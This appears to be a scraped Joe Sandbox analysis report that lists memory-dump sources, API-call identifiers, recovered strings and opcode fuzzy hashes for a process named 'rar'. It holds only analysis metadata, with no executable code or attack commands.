                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentProcess_invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID: *?$.
                                                                                                                                                                                                                              • API String ID: 2518042432-3972193922
                                                                                                                                                                                                                              • Opcode ID: 354f185c14a0bc8d05e3972864cc7dbacf8a132eb4984f49e6355014e857c6aa
                                                                                                                                                                                                                              • Instruction ID: c3b8d82b4ce5100a16e67642e5606495364b9bb05af275e8fc76cb9e2f5c7ad5
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 354f185c14a0bc8d05e3972864cc7dbacf8a132eb4984f49e6355014e857c6aa
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D951D162F25AA585EB18DFAAA8004AC67A4FB48BD8B484631DF0D97B95DF3DD042C710
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3429775523-0
                                                                                                                                                                                                                              • Opcode ID: db3c1d02e190598f29aa164aeddc5f855d0a4ca8ba77325bab1d25996cb1689a
                                                                                                                                                                                                                              • Instruction ID: c896e45e59c7abcea306fafbcae97b4fad9d05064054ca909d28d3e3e23dcb38
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: db3c1d02e190598f29aa164aeddc5f855d0a4ca8ba77325bab1d25996cb1689a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8D111C72B14A418EE7148FB9E4912AE77B0FB48748F40563ADB8D93A68DF3CD144CB04
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorFormatLastMessage
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3479602957-0
                                                                                                                                                                                                                              • Opcode ID: 5edc9aacada912d44111c0c5b3025bcfc37222d54029d4996b892e874874bebb
                                                                                                                                                                                                                              • Instruction ID: c266759fc2134d8da3bf03023a5ccc8e9aa61740b089d2e234ba137526af0e53
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5edc9aacada912d44111c0c5b3025bcfc37222d54029d4996b892e874874bebb
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 91F05E31B08B8182E3108F6AB44412BA7A5FB99BD4F088534EB8993B69CF7CC5518B44
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: DiskFreeSpace
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1705453755-0
                                                                                                                                                                                                                              • Opcode ID: 336a33042f1e52100b28f5a1ad6ae687e8956255ef3791e684bc327077314d0d
                                                                                                                                                                                                                              • Instruction ID: 581b6e06013a9210e29bc3fbd1ae8f40ad8597621b9387624f8bc4e5e91cc411
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 336a33042f1e52100b28f5a1ad6ae687e8956255ef3791e684bc327077314d0d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DF012D2262868286EB70DB19E4553AAB3B1FB88744F800531E78CC6598DF2CD644CF40
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID: INF$NAN$NAN(IND)$NAN(SNAN)$inf$nan$nan(ind)$nan(snan)
                                                                                                                                                                                                                              • API String ID: 3215553584-2617248754
                                                                                                                                                                                                                              • Opcode ID: 336881e81ddd14afa9560f251b33c86b073c2b2d41bd1fd01ec7cedf827ef5ce
                                                                                                                                                                                                                              • Instruction ID: cd937f801d2c09c060d2e47e2694988250106d75722e3469439008024b0a6ed3
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 336881e81ddd14afa9560f251b33c86b073c2b2d41bd1fd01ec7cedf827ef5ce
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9541AA72B09B9589E708CF69E8517A933A4FB18388F44423AEF5C87BA5DE3DD065C340
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Console$Mode$Handle$Readfflush
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1039280553-0
                                                                                                                                                                                                                              • Opcode ID: 5c62bb105008418d5d8f1a35d4748ced2dc44b1bf30dc7e2d2292546f420945d
                                                                                                                                                                                                                              • Instruction ID: 69e25be96bcd1ad8687e638ad3b2b8c771cdf05e96cdccc5db5e2bfee700fc8a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5c62bb105008418d5d8f1a35d4748ced2dc44b1bf30dc7e2d2292546f420945d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 56216235B18A829BEA149F29E8045396361FB8DBA1F540231EF4A47B74DF3CE446C744
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExceptionThrowstd::bad_alloc::bad_alloc
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 932687459-0
                                                                                                                                                                                                                              • Opcode ID: 17b6f32cd8d6fcc81585299b8a9163aaa78fd032cef7b8e26f7336cc4ddc1b9c
                                                                                                                                                                                                                              • Instruction ID: 9a8c94d6be61bdadb165d8945c05739c20d8487b9a9a57c18d43c2fa7be63fe6
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 17b6f32cd8d6fcc81585299b8a9163aaa78fd032cef7b8e26f7336cc4ddc1b9c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CF81E922A0DA8699EB29DB29D4703BD6350FB4CB94F984A31DB4D87BB5DF7CE4418304
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: swprintf
                                                                                                                                                                                                                              • String ID: ;%u$x%u$xc%u
                                                                                                                                                                                                                              • API String ID: 233258989-2277559157
                                                                                                                                                                                                                              • Opcode ID: 18e8202548affe00674286321b5f124759c48e138fb2ddf063aaae7488dbebd7
                                                                                                                                                                                                                              • Instruction ID: f01c2bf0823c4192e14907de196a3eb37256f17e7546b9a4519a2dfaaf991221
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 18e8202548affe00674286321b5f124759c48e138fb2ddf063aaae7488dbebd7
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E202BD22B1C68681EA38DA2991493FE67B1BF49780F000035DB9EDB6A7DFADF445C311
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FileMoveNamePath$CompareLongShortStringswprintf
                                                                                                                                                                                                                              • String ID: rtmp%d
                                                                                                                                                                                                                              • API String ID: 2308737092-3303766350
                                                                                                                                                                                                                              • Opcode ID: de0bcd3fdd60b8f1859e4975922cee0e0ab7dbe13660142ab9f58961243ff5d4
                                                                                                                                                                                                                              • Instruction ID: b12e2fe16e794663e519c11788ee222e497519776e1a1075d6457e0fe50d8dd3
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: de0bcd3fdd60b8f1859e4975922cee0e0ab7dbe13660142ab9f58961243ff5d4
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9D518416B985C685EA30DF29E8591FD6361BF48784F551131DB0DC7AAADF3CE605C310
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CloseCreateEventHandle$ErrorLast
                                                                                                                                                                                                                              • String ID: rar -ioff
                                                                                                                                                                                                                              • API String ID: 4151682896-4089728129
                                                                                                                                                                                                                              • Opcode ID: 1b32cc9a5b3853ccf39725862a0ac8b7945a78bb0f3e0147b511bdfad103efab
                                                                                                                                                                                                                              • Instruction ID: 3538cf37bccc810530778cad8212ab69147ffa62d04ffdd3317db0d7976d8142
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1b32cc9a5b3853ccf39725862a0ac8b7945a78bb0f3e0147b511bdfad103efab
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BD016D24A1AA47C6FB1DDFB8E9546392371BF4C706F544A31DB0E862B0CF3CA0488644
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AddressProc$HandleModule
                                                                                                                                                                                                                              • String ID: SetDefaultDllDirectories$SetDllDirectoryW$kernel32
                                                                                                                                                                                                                              • API String ID: 667068680-1824683568
                                                                                                                                                                                                                              • Opcode ID: 8cf5c4d02fd6faa15582d92511ad3bd01355bb3a29212f000fb48e6594ec6bc8
                                                                                                                                                                                                                              • Instruction ID: 3d4a43fbdc51cd9b975287ed98888777bd79b89074c31b53e0b531c86090eb4d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8cf5c4d02fd6faa15582d92511ad3bd01355bb3a29212f000fb48e6594ec6bc8
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C9F03C25A09B8682EE08DF19F9540792760BF4DBC0B489630DE1E87734EF3CE449C304
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID: +$-
                                                                                                                                                                                                                              • API String ID: 3215553584-2137968064
